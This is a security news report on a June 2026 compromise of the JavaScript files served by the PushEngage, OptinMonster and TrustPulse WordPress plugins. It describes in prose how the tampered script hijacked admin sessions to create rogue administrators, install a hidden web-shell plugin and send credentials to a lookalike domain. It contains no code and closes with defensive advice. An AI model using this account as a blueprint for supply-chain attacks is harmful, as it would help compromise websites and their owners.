Recent reports have uncovered a significant security breach involving popular WordPress plugins—PushEngage, OptinMonster, and TrustPulse. Malicious actors tampered with JavaScript files associated with these plugins, embedding code designed to create unauthorized administrator accounts and install concealed backdoors on affected websites.
The attack specifically targeted logged-in site administrators. When an admin loaded the compromised script, the malicious code exploited their session to establish a new admin account under the attacker’s control. Additionally, it installed a hidden plugin that provided persistent access to the site. Notably, this exploit did not affect regular site visitors.
Security firm Sansec identified this campaign on June 13, 2026, detecting the same malicious code across the JavaScript files served by all three plugins. PushEngage, a service acquired by Awesome Motive, confirmed the breach and acknowledged that its scripts had been altered to facilitate site takeovers. As of June 15, 2026, OptinMonster and TrustPulse, also under Awesome Motive, had not issued official statements regarding the incident.
The exposure periods varied among the plugins. For OptinMonster and TrustPulse, the malicious code was present for approximately 25 minutes on June 12, 2026, between 22:17 and 22:42 UTC. In contrast, PushEngage’s scripts remained compromised for several hours on the same day, with some instances persisting until June 14, 2026.
Collectively, these plugins are utilized by over 1.2 million websites, with OptinMonster alone accounting for more than a million active installations. However, this figure represents the potential reach of the compromised scripts and does not necessarily indicate the number of sites that were successfully infiltrated.
The attack mechanism was sophisticated. The malicious script remained dormant during standard page views but activated when a logged-in administrator accessed the site. Upon activation, it leveraged the admin’s session to perform the following actions:
- Created a new administrator account controlled by the attacker.
- Installed a concealed plugin that does not appear in the WordPress dashboard.
- Transmitted the new login credentials and site information to a deceptive domain, tidio[.]cc, designed to mimic the legitimate tidio.com.
The hidden plugin functioned as a web shell, granting the attacker remote command execution capabilities. This access allowed them to manipulate files, exfiltrate data, inject malicious code, and establish further backdoors, thereby compromising the site’s integrity and security.
Given the stealthy nature of this attack, affected site owners may not immediately detect the breach through standard administrative interfaces. It is imperative for administrators to conduct thorough server-level inspections to identify and remediate any unauthorized changes.
This incident underscores the critical importance of supply chain security in web development. Plugins and third-party scripts, while enhancing functionality, can also serve as vectors for attacks if not properly secured. Website owners should remain vigilant, ensure timely updates, and monitor for any unusual activity to safeguard their platforms against such sophisticated threats.
